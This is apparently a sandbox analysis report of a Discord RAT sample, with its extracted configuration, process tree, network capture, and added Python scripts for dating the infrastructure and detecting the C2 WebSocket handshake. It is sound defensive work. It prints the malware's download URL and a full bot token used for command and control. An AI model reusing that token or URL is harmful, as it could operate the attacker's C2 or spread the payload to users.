Analysis

  • max time kernel
    269s
  • max time network
    271s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/03/2024, 19:43 UTC

General

  • Target

    https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIyMTkwNjUwNzI5ODM3NzkzMA.GiWyBe.bMc6EfTRKlt2YGmTuWnfGBRENjujQeWux4PFow

  • server_id

    1221895306120265778
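
The extracted config above is enough to date the operator's infrastructure without touching Discord at all. The following is an added example, not part of the tria.ge report and not the sample's code: it decodes the first dot-separated segment of the bot token (the base64 of the bot's user id), reads the creation time out of each Discord snowflake id (the 42 bits above bit 22 are milliseconds since 2015-01-01 UTC), and parses the `is`/`ex` hex timestamps on the signed CDN URL from the Target section. The constants are the page's own values; the function names are mine; the second and third token segments are deliberately not decoded.

```python
"""Triage helpers for the Discord-C2 config extracted on this page.

Added example (not tria.ge code, not the sample's code). Facts relied on:
  * the first segment of a Discord bot token is the base64 of the bot user id;
  * every Discord id (user, guild, channel, message) is a snowflake whose
    bits 22..63 hold milliseconds since 2015-01-01T00:00:00Z;
  * a signed cdn.discordapp.com URL carries `is` (issued) and `ex` (expires)
    as hex unix timestamps.
"""
import base64
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

DISCORD_EPOCH_MS = 1_420_070_400_000

# Values copied from the report: extracted config and the Target URL.
EXTRACTED_TOKEN = "MTIyMTkwNjUwNzI5ODM3NzkzMA.GiWyBe.bMc6EfTRKlt2YGmTuWnfGBRENjujQeWux4PFow"
SERVER_ID = 1221895306120265778
TARGET_URL = ("https://cdn.discordapp.com/attachments/1221895306933833802/"
              "1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2"
              "&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&")


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake (UTC, millisecond precision)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms // 1000, tz=timezone.utc).replace(
        microsecond=(ms % 1000) * 1000)


def token_user_id(token: str) -> int:
    """Bot user id from the first token segment; raises ValueError otherwise."""
    segments = token.split(".")
    if len(segments) != 3:
        raise ValueError("expected three dot-separated segments")
    first = segments[0] + "=" * (-len(segments[0]) % 4)   # restore base64 padding
    decoded = base64.urlsafe_b64decode(first).decode("ascii")
    if not decoded.isdigit():
        raise ValueError("first segment does not decode to a numeric id")
    return int(decoded)


def attachment_ids(url: str) -> tuple[int, int]:
    """(channel id, message id) from /attachments/<channel>/<message>/<file>."""
    parts = urlsplit(url).path.strip("/").split("/")
    i = parts.index("attachments")
    return int(parts[i + 1]), int(parts[i + 2])


def signed_url_window(url: str) -> tuple[datetime, datetime]:
    """(issued, expires) from the is= and ex= hex timestamps of a signed CDN URL."""
    q = parse_qs(urlsplit(url).query)
    issued = datetime.fromtimestamp(int(q["is"][0], 16), tz=timezone.utc)
    expires = datetime.fromtimestamp(int(q["ex"][0], 16), tz=timezone.utc)
    return issued, expires


def timeline(token: str, server_id: int, url: str) -> list[tuple[str, datetime]]:
    """Infrastructure creation events in order: a quick 'how fresh is this' view."""
    channel_id, message_id = attachment_ids(url)
    events = [
        ("guild created", snowflake_to_datetime(server_id)),
        ("channel created", snowflake_to_datetime(channel_id)),
        ("bot application created", snowflake_to_datetime(token_user_id(token))),
        ("payload message posted", snowflake_to_datetime(message_id)),
    ]
    return sorted(events, key=lambda e: e[1])


if __name__ == "__main__":
    for name, when in timeline(EXTRACTED_TOKEN, SERVER_ID, TARGET_URL):
        print(f"{when:%Y-%m-%d %H:%M:%S.%f} UTC  {name}")
    issued, expires = signed_url_window(TARGET_URL)
    print(f"CDN link issued {issued:%Y-%m-%d %H:%M:%S} UTC, valid {(expires - issued).days} days")
```

Run against the values on this page this yields: guild and channel created 2024-03-25 18:55:42 UTC, bot application created 19:40:13, payload message posted 19:42:58 (the same second as the last-modified header on the CDN response under Network), CDN link issued 19:42:58 and valid for 14 days, submission at 19:43. The entire C2 setup was under an hour old at analysis time. When sharing indicators, the bot user id derived here is the useful, non-secret part; the remaining token segments are what actually authenticate, so report the id rather than the full token.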

Signatures

  • Discord RAT
    A RAT written in C# using Discord as a C2. The extracted config holds the bot token the implant authenticates with and the server (guild) id the operator works from; in this run the dropped Client-built.exe resolves gateway.discord.gg and completes a WebSocket upgrade to it (see Network), which is the C2 channel being established.
  • Executes dropped EXE (2 IoCs)
  • Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
    SCSI information is often read in order to detect sandboxing environments. Here the hit is attributed to taskmgr.exe (PID 5972) rather than to Client-built.exe, so it reflects the interactive session, not the sample.
  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Modifies registry class (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
  • Suspicious use of AdjustPrivilegeToken (11 IoCs)
  • Suspicious use of FindShellTrayWindow (64 IoCs)
  • Suspicious use of SendNotifyMessage (64 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

  Of these, only "Executes dropped EXE" and "Suspicious use of AdjustPrivilegeToken" are attributed to the sample's own processes (Client-built.exe, PIDs 5796 and 3360) in the process tree below; every other hit comes from msedge.exe, 7zG.exe or taskmgr.exe, i.e. from the download, extraction and task-manager activity of the session.
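
The Network section captures the two exchanges that matter for detection: msedge.exe fetching the RAR from cdn.discordapp.com, and Client-built.exe, a process that is neither a browser nor the Discord client and sends no User-Agent, completing a WebSocket upgrade to gateway.discord.gg. The following is an added example, not tria.ge or any vendor's detection content: it turns that into two host-side rules over request records in the report's own layout. The request texts are copied from the page; DISCORD_CLIENT_ALLOWLIST and the function names are assumptions to tune per environment.

```python
"""Detection logic for the C2 handshake captured under Network on this page.

Added example; not tria.ge or vendor detection content. Request records are
copied from the report (process name plus the request text as printed there).
"""
from dataclasses import dataclass, field

# Assumption: processes expected to reach Discord endpoints on a workstation.
DISCORD_CLIENT_ALLOWLIST = {"discord.exe", "msedge.exe", "chrome.exe", "firefox.exe"}


@dataclass
class HttpRequest:
    process: str
    method: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("host", "").lower()


def parse_request(process: str, raw: str) -> HttpRequest:
    """Parse 'METHOD path HTTP/x' followed by 'Name: value' lines (report layout)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:                                   # skip stray non-header lines
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(process, method, path, headers)


def is_websocket_upgrade(req: HttpRequest) -> bool:
    """RFC 6455 handshake markers; 'Connection' may carry several tokens."""
    connection_tokens = {t.strip().lower() for t in req.headers.get("connection", "").split(",")}
    return req.headers.get("upgrade", "").lower() == "websocket" and "upgrade" in connection_tokens


def evaluate(req: HttpRequest) -> list[str]:
    """Return one finding per rule that fires for this request."""
    findings: list[str] = []
    if req.process.lower() in DISCORD_CLIENT_ALLOWLIST:
        return findings
    if is_websocket_upgrade(req) and req.host.endswith("discord.gg"):
        ua = req.headers.get("user-agent", "<none>")
        findings.append(f"{req.process}: WebSocket upgrade to Discord gateway "
                        f"{req.host}{req.path} (User-Agent: {ua})")
    if req.host == "cdn.discordapp.com" and req.path.startswith("/attachments/"):
        findings.append(f"{req.process}: attachment fetch from Discord CDN "
                        f"{req.path.split('?')[0]}")
    return findings


# Records copied from the Network section of this report.
GATEWAY_UPGRADE = """GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: uPXFDRKz7aziwqozWBckXA==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg"""

CDN_DOWNLOAD = """GET /attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4& HTTP/2.0
host: cdn.discordapp.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
upgrade-insecure-requests: 1"""


def run_report_records() -> dict[str, list[str]]:
    """Evaluate the two exchanges the report attributes to msedge.exe and Client-built.exe."""
    return {
        "msedge.exe": evaluate(parse_request("msedge.exe", CDN_DOWNLOAD)),
        "Client-built.exe": evaluate(parse_request("Client-built.exe", GATEWAY_UPGRADE)),
    }


if __name__ == "__main__":
    for process, findings in run_report_records().items():
        print(process, findings or "no findings")
```

The allowlist is the weak point of any such rule: a RAT can run inside, or inject into, a browser process. Pair it with the process-tree evidence (here the gateway connection comes from a freshly extracted EXE under Downloads) rather than relying on the process name alone.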

Processes

  Chain in this run: msedge.exe (PID 3984) downloads Client-built.rar from the Discord CDN, 7zG.exe (PID 5704) extracts it to C:\Users\Admin\Downloads\Client-built\, and the dropped Client-built.exe is started twice (PIDs 5796 and 3360). The nested entries under PID 3984 are Edge helper processes; CompPkgSrv.exe, rundll32.exe and taskmgr.exe are top-level processes of the interactive session. None of them is a child of the sample.

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3984)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&
    Signatures: Enumerates system info in registry; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
    • msedge.exe (PID 2044)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9b3b46f8,0x7ffa9b3b4708,0x7ffa9b3b4718
    • msedge.exe (PID 1508)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    • msedge.exe (PID 1120)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
      Signatures: Suspicious behavior: EnumeratesProcesses
    • msedge.exe (PID 2316)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
    • msedge.exe (PID 2572)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
    • msedge.exe (PID 4532)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
    • identity_helper.exe (PID 3052)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
    • identity_helper.exe (PID 3572)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
    • msedge.exe (PID 4404)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
    • msedge.exe (PID 4016)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
    • msedge.exe (PID 684)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3372 /prefetch:8
    • msedge.exe (PID 2692)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
    • msedge.exe (PID 4640)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8
      Signatures: Suspicious behavior: EnumeratesProcesses
    • msedge.exe (PID 4640)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
    • msedge.exe (PID 3292)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
    • msedge.exe (PID 2164)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4632 /prefetch:2
  • C:\Windows\System32\CompPkgSrv.exe (PID 3996)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
  • C:\Windows\System32\CompPkgSrv.exe (PID 540)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
  • C:\Windows\System32\rundll32.exe (PID 5392)
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  • C:\Program Files\7-Zip\7zG.exe (PID 5704)
    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Client-built\" -spe -an -ai#7zMap21022:86:7zEvent25284
    Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
  • C:\Users\Admin\Downloads\Client-built\Client-built.exe (PID 5796)
    "C:\Users\Admin\Downloads\Client-built\Client-built.exe"
    Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
  • C:\Windows\system32\taskmgr.exe (PID 5972)
    "C:\Windows\system32\taskmgr.exe" /4
    Signatures: Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  • C:\Users\Admin\Downloads\Client-built\Client-built.exe (PID 3360)
    "C:\Users\Admin\Downloads\Client-built\Client-built.exe"
    Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

                                  Network

                                  • flag-us
                                    DNS
                                    81.171.91.138.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    81.171.91.138.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    81.171.91.138.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    81.171.91.138.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    cdn.discordapp.com
                                    msedge.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cdn.discordapp.com
                                    IN A
                                    Response
                                    cdn.discordapp.com
                                    IN A
                                    162.159.133.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.129.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.130.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.135.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.134.233
                                  • flag-us
                                    GET
                                    https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&
                                    msedge.exe
                                    Remote address:
                                    162.159.133.233:443
                                    Request
                                    GET /attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4& HTTP/2.0
                                    host: cdn.discordapp.com
                                    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                    sec-ch-ua-mobile: ?0
                                    dnt: 1
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    accept-encoding: gzip, deflate, br
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 200
                                    date: Mon, 25 Mar 2024 19:43:15 GMT
                                    content-type: application/vnd.rar
                                    content-length: 26774
                                    cf-ray: 86a163855f1b6430-LHR
                                    cf-cache-status: MISS
                                    accept-ranges: bytes, bytes
                                    cache-control: public, max-age=31536000
                                    content-disposition: attachment; filename="Client-built.rar"
                                    etag: "3d78b5ab445d0602ff0c4b47582d91c5"
                                    expires: Tue, 25 Mar 2025 19:43:15 GMT
                                    last-modified: Mon, 25 Mar 2024 19:42:58 GMT
                                    vary: Accept-Encoding
                                    alt-svc: h3=":443"; ma=86400
                                    x-goog-generation: 1711395778575456
                                    x-goog-hash: crc32c=wUCvAw==
                                    x-goog-hash: md5=PXi1q0RdBgL/DEtHWC2RxQ==
                                    x-goog-metageneration: 1
                                    x-goog-storage-class: STANDARD
                                    x-goog-stored-content-encoding: identity
                                    x-goog-stored-content-length: 26774
                                    x-guploader-uploadid: ABPtcPpaVP-ZsfAjbQw_HpcEo6_m8QzzsO-ih9kKda412uUs9wPkfpTdAzIeRz4wcC_1TRsjseo
                                    x-robots-tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                    set-cookie: __cf_bm=12XOFFQrjtnFHGJ2GUn01szkYq8waXruC_4NSXbCeFo-1711395795-1.0.1.1-dCkCBHqOODFr4uaJnSztcT4F39_ACsl6cDyNoqUWXfq1DTLPaztzx9_3HP7bweImIR0VIiBQl1zsxYJ2stYLOA; path=/; expires=Mon, 25-Mar-24 20:13:15 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWEEPTbcWx4y%2BXu8S%2FLLP2qM5LaMqzRf3gyenb6uXSm6iBZ7kgAbGCDMPZJ%2Fj5xscmQmMU9zyNMaGUsuvlLvg73wZlSZOPTcyzv2LdkV7ViWKrx0LikAXJ2YrXrvaSAJ5jro4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    set-cookie: _cfuvid=VBFGENfq44mZv_j5Shpcssn8GoL4hZr9XnnPCiZsbTo-1711395795111-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                    server: cloudflare
                                  • flag-us
                                    DNS
                                    0.159.190.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0.159.190.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    61.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    61.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    61.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-61deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    233.133.159.162.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    233.133.159.162.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    13.86.106.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    13.86.106.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    9.228.82.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    9.228.82.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    43.58.199.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    43.58.199.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    41.110.16.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    41.110.16.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    41.110.16.96.in-addr.arpa
                                    IN PTR
                                    a96-16-110-41deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    50.23.12.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.23.12.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    gateway.discord.gg
                                    Client-built.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    gateway.discord.gg
                                    IN A
                                    Response
                                    gateway.discord.gg
                                    IN A
                                    162.159.133.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.136.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.130.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.135.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.134.234
                                  • flag-us
                                    DNS
                                    gateway.discord.gg
                                    Client-built.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    gateway.discord.gg
                                    IN A
                                  • flag-us
                                    GET
                                    https://gateway.discord.gg/?v=9&encording=json
                                    Client-built.exe
                                    Remote address:
                                    162.159.133.234:443
                                    Request
                                    GET /?v=9&encording=json HTTP/1.1
                                    Connection: Upgrade,Keep-Alive
                                    Upgrade: websocket
                                    Sec-WebSocket-Key: uPXFDRKz7aziwqozWBckXA==
                                    Sec-WebSocket-Version: 13
                                    Host: gateway.discord.gg
                                    Response
                                    HTTP/1.1 101 Switching Protocols
                                    Date: Mon, 25 Mar 2024 19:43:35 GMT
                                    Connection: upgrade
                                    sec-websocket-accept: Hoz5Ky/7+qgsVffE5L20qGHu4kM=
                                    upgrade: websocket
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FUzKM0J%2BjZ9L3JcNPhdVkN8ctq5UQPKthpPBQeI4EjtldQKvKAOndkai4zfW9lFtO9i274nYY%2BMROubKNngMlUXUqNpRi3hkR%2BTKi6zHL%2BseJFeGeEha469VDPbPmClAyQ2C0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    X-Content-Type-Options: nosniff
                                    Server: cloudflare
                                    CF-RAY: 86a16404ccee773b-LHR
                                  • flag-us
                                    DNS
                                    206.23.85.13.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    206.23.85.13.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    234.133.159.162.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    234.133.159.162.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    195.177.78.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    195.177.78.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    195.177.78.104.in-addr.arpa
                                    IN PTR
                                    a104-78-177-195deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    119.110.54.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    119.110.54.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    140.71.91.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    140.71.91.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    140.71.91.104.in-addr.arpa
                                    IN PTR
                                    a104-91-71-140deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    55.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    55.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    55.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-55deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    72.135.221.88.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    72.135.221.88.in-addr.arpa
                                    IN PTR
                                    Response
                                    72.135.221.88.in-addr.arpa
                                    IN PTR
                                    a88-221-135-72deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    45.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    45.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    45.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-45.deploy.static.akamaitechnologies.com
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
